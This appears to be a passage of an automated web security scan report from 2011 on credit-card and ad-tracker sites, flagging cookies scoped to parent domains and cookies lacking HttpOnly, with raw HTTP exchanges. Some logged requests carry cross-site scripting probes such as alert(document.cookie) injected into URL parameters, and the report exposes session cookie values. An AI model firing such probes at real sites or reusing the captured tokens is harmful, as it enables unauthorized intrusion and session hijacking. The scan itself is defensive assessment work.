Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=CA8592065BB2D7FA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: max-age=3600
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 20:55:30 GMT
Accept-Ranges: bytes
Content-Length: 5261
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/jpeg
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

......JFIF.....d.d.....HMEDIABIN_DIDB #MB%:{CF8F524C-6750-484A-AA5F-D771FB9334F4}MEDIABIN:%MB#....Ducky.......2.....,Photoshop 3.0.8BIM.........H.......H..........http://ns.adobe.com/xap/1.0/.<?xpacke
...[SNIP]...

9.42. http://www.wtp101.com/bk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/bk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Sun, 16 Jun 2013 12:12:23 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bk?bk_uuid=FX6%2BES9c99Otz5OB&nocb=1&redir=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2750%3Fid=PARTNER_UUID HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&phint=__bk_t%3DCredit%20Cards%20-%20Compare%20Credit%20Card%20Offers%20at%20CreditCards.com&phint=__bk_k%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&limit=4&r=99971968
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Fri, 17 Jun 2011 12:12:23 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://tags.bluekai.com/site/2750?id=73b6b0a9-a657-4959-8c44-a72cc1d5226b
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Sun, 16 Jun 2013 12:12:23 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

9.43. https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/simplycash-business-credit-card/apply/42732-9-0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:06:48 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.44. https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:03:57 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10. Cookie without HttpOnly flag set previous next
There are 73 instances of this issue:

https://application.capitalone.com/icoreapp/jsp/landing.jsp
http://dg.specificclick.net/
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
https://www.applyonlinenow.com/USCCapp/Ctl/display
https://www.applyonlinenow.com/USCCapp/Ctl/entry
https://www.applyonlinenow.com/USCCapp/Ctl/validate
http://www.capitalone.com/smallbusiness/cards/venture-for-business/
https://www.citicards.com/cards/acq/Apply.do
https://www.citicards.com/cards/acq/Apply.do
https://www.citicards.com/cards/acq/displayECM.do
https://www.citicards.com/cards/acq/genericcontent.do
http://ad.yieldmanager.com/pixel
http://as00.estara.com/fs/ruleaction.php
http://b.scorecardresearch.com/b
http://cf.addthis.com/red/p.json
http://citi.bridgetrack.com/usc/_bt_appredir.asp
http://citi.bridgetrack.com/usc/_spredir.htm
http://citi.bridgetrack.com/usc/_spredir.htm
http://click.linksynergy.com/fs-bin/click
http://click.linksynergy.com/fs-bin/click
http://creditcards.citicards.com/usc/_bt_appredir.asp
http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm
http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm
http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm
http://pixel.33across.com/ps/
http://s46.sitemeter.com/js/counter.asp
http://sales.liveperson.net/hc/32528459/
http://sales.liveperson.net/hc/32528459/
http://spotlight.creditcards.com/www/delivery/ajs.php
http://spotlight.creditcards.com/www/delivery/lg.php
http://tags.bluekai.com/site/2750
http://tags.bluekai.com/site/2939
http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css
http://www.capitalone.com/css/global/portal_base.css
http://www.capitalone.com/css/global/portal_common.css
http://www.capitalone.com/css/global/portal_grid.css
http://www.capitalone.com/css/global/portal_print.css
http://www.capitalone.com/css/page-type/portal_landing-accordion.css
http://www.capitalone.com/css/page-type/portal_popup.css
http://www.capitalone.com/css/page-type/portal_product.css
http://www.capitalone.com/css/portal_footer.css
http://www.capitalone.com/css/portal_header.css
http://www.capitalone.com/css/portal_page-nav-heading.css
http://www.capitalone.com/img/global/icon/lock.gif
http://www.capitalone.com/img/global/logo/ehl.png
http://www.capitalone.com/img/global/logo/fdic.png
http://www.capitalone.com/img/global/logo/sprite/header.gif
http://www.capitalone.com/js/component/portal_accordion.js
http://www.capitalone.com/js/component/portal_open_account.js
http://www.capitalone.com/js/component/portal_swfobject.js
http://www.capitalone.com/js/component/portal_utilitynav.js
http://www.capitalone.com/js/global/cof/portal_header.js
http://www.capitalone.com/js/global/cof/portal_headerFooter.js
http://www.capitalone.com/js/global/portal_cof.js
http://www.capitalone.com/js/global/portal_footnote.js
http://www.capitalone.com/js/global/portal_global.js
http://www.capitalone.com/js/liveperson/LivePerson_USC_VS.js
http://www.capitalone.com/js/liveperson/mtagconfig.js
http://www.capitalone.com/js/onlineopinionF3cS/oo_conf_en-US.js
http://www.capitalone.com/js/onlineopinionF3cS/oo_engine.js
http://www.capitalone.com/js/questus/config.js
http://www.capitalone.com/js/questus/intercept.js
http://www.capitalone.com/media/graphic_logo/global/button/action-oversized-apply-now.png
http://www.capitalone.com/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg
https://www.citicards.com/cards/acq/TimeOut.do
http://www.creditcards.com/oc/
http://www.creditcards.com/sb.php
https://www.discovercard.com/cardmembersvcs/registration/reg/goto
http://www.wtp101.com/bk
https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0
https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

10.1. https://application.capitalone.com/icoreapp/jsp/landing.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/jsp/landing.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=7R2PN7BWkq05FB2nsTl1DjYPsgvXT2vPp222kzwTp1ZqXy1729fJ!-968881363; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.2. http://dg.specificclick.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dg.specificclick.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=d831adc767cdca842f5d94e33487; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?y=3&t=h&u=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&r=http%3A%2F%2Fburp%2Fshow%2F6 HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7qHV^0^3; smdmp=7qEy:811200901^7qEy:1; adf=7qHV^0^0; ug=FiMiv7kDK4v9CD; JSESSIONID=d7871db8b8acefd6fc93aed0ae52

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=d831adc767cdca842f5d94e33487; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 17 Jun 2011 12:11:12 GMT
Vary: Accept-Encoding
Content-Length: 569
Connection: Keep-Alive

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...

10.3. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQASASRDT=CADAEEFBMKGKAJFKMDJNHNDO; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=32528459&d_id=sb-sales-english HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(1)//fd5f10cff0
Cookie: LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1308312408486; ASPSESSIONIDSARDTDCT=JHCIMLECCHIIGDFOEGCGBDHM; ASPSESSIONIDACDQDTTB=JIEHKIJCJAMFMOBIPBLNKKFE

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:07:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2124
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQASASRDT=CADAEEFBMKGKAJFKMDJNHNDO; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 32528459
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

10.4. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSQACRQCA=KBFILLHBLECAOPMHGOINANGG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=32528459&d_id=sb-sales-english HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1308312408486; ASPSESSIONIDSARDTDCT=JHCIMLECCHIIGDFOEGCGBDHM

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:07:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2124
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQACRQCA=KBFILLHBLECAOPMHGOINANGG; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 32528459
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

10.5. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSARDTDCT=JHCIMLECCHIIGDFOEGCGBDHM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=32528459&d_id=sb-sales-english HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1308227924895

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2124
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSARDTDCT=JHCIMLECCHIIGDFOEGCGBDHM; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 32528459
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

10.6. https://www.applyonlinenow.com/USCCapp/Ctl/display previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/display

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0000M0rR0J2Y8xxLnoLQet1F3rI:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.7. https://www.applyonlinenow.com/USCCapp/Ctl/entry previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0000AcsFbEU7BtYedf8xPa1--z8:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.8. https://www.applyonlinenow.com/USCCapp/Ctl/validate previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/validate

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0000txUoQLMgfpEEZGH4aujROUY:-1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.9. http://www.capitalone.com/smallbusiness/cards/venture-for-business/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.capitalone.com
Path:	/smallbusiness/cards/venture-for-business/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WWWJSESSIONID=QfmGN7BTg0PVLQh9shh7J4wx98JVymDjjJ517tMnYMVD5qnrzfQv!512190221!1391065199; domain=.capitalone.com; path=/; secure
Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; domain=.capitalone.com; expires=Monday, 14-Jun-2021 11:59:10 GMT; path=/
SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/
portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:10 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA; BIGipServerpl_capitalone.com_80=828974346.29215.0000; external_id=GAN_ZZ10700001_USCGAN_j26689465k112308_631528059; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=

Response

10.10. https://www.citicards.com/cards/acq/Apply.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.citicards.com
Path:	/cards/acq/Apply.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000LN-SZdCBn1IHp2JZMK_jEdN:gtcardsrmi10crd; Path=/; Secure
HSID4T3ZJ3000=3Ez3d13Y1PV2PydTp3fmBP; Path=/; Domain=www.citicards.com; Secure
Channel=CONSUMER_UNSOL; Path=/; Domain=www.citicards.com; Secure
ProspectID=36CEB96C744948E481109575676DCE63; Path=/; Domain=www.citicards.com; Secure
ACQHSIDKEY=HSID4T3ZJ3000; Path=/; Domain=www.citicards.com; Secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63 HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://online.citibank.com/US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047&ProspectID=36CEB96C744948E481109575676DCE63
Content-Length: 0
Cache-Control: max-age=0
Origin: https://online.citibank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; HSID4T3ZJ3000=kffdVRWEuNJx2hojRrLECb; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=36CEB96C744948E481109575676DCE63; CARDS_LOCALE=en; ACQHSIDKEY=HSID4T3VJ3000; JSESSIONID=0000nDeneI9o8pv-LTRpzUZaZtt:gtcardsrmi10crd; s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_PlatSelect_MC_21monthBTP%7C1308314699502%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:16:58 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: JSESSIONID=0000LN-SZdCBn1IHp2JZMK_jEdN:gtcardsrmi10crd; Path=/; Secure
Set-cookie: CARDS_LOCALE=en; Path=/
Set-cookie: HSID4T3ZJ3000=3Ez3d13Y1PV2PydTp3fmBP; Path=/; Domain=www.citicards.com; Secure
Set-cookie: siteId=CB; Path=/; Domain=.citicards.com; Secure
Set-cookie: Channel=CONSUMER_UNSOL; Path=/; Domain=www.citicards.com; Secure
Set-cookie: LangId=EN; Path=/; Domain=www.citicards.com; Secure
Set-cookie: DecisionMethod=02; Path=/; Domain=www.citicards.com; Secure
Set-cookie: ProspectID=36CEB96C744948E481109575676DCE63; Path=/; Domain=www.citicards.com; Secure
Set-cookie: ACQHSIDKEY=HSID4T3ZJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 88403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

...[SNIP]...

10.11. https://www.citicards.com/cards/acq/Apply.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.citicards.com
Path:	/cards/acq/Apply.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000Ho6b9ssBtDTaeSkMcYAOnV3:gtcardsrmi10crd; Path=/; Secure
HSID4DNZJ3000=vRlUqdovLuymEWEwEeCpjj; Path=/; Domain=www.citicards.com; Secure
Channel=CONSUMER_UNSOL; Path=/; Domain=www.citicards.com; Secure
ProspectID=C626E9F2656E4606A21348462D13F6BA; Path=/; Domain=www.citicards.com; Secure
ACQHSIDKEY=HSID4DNZJ3000; Path=/; Domain=www.citicards.com; Secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /cards/acq/Apply.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://online.citibank.com/US/JRS/portal/prefillApps.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA
Content-Length: 0
Cache-Control: max-age=0
Origin: https://online.citibank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; CARDS_LOCALE=en; HSID4T3ZJ3000=vqPrL3WjoMdXwjrs5f4CZU; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=36CEB96C744948E481109575676DCE63; ACQHSIDKEY=HSID4T3ZJ3000; JSESSIONID=0000nDeneI9o8pv-LTRpzUZaZtt:gtcardsrmi10crd; s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_DiamondPreferred_MC_21monthBTP%7C1308314709677%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

10.12. https://www.citicards.com/cards/acq/displayECM.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.citicards.com
Path:	/cards/acq/displayECM.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000fNcTBpmEK6E4ec12wszbhSM:gtcardsrmi10crd; Path=/; Secure
ACQHSIDKEY=HSID4T3VJ3000; Path=/; Domain=www.citicards.com; Secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

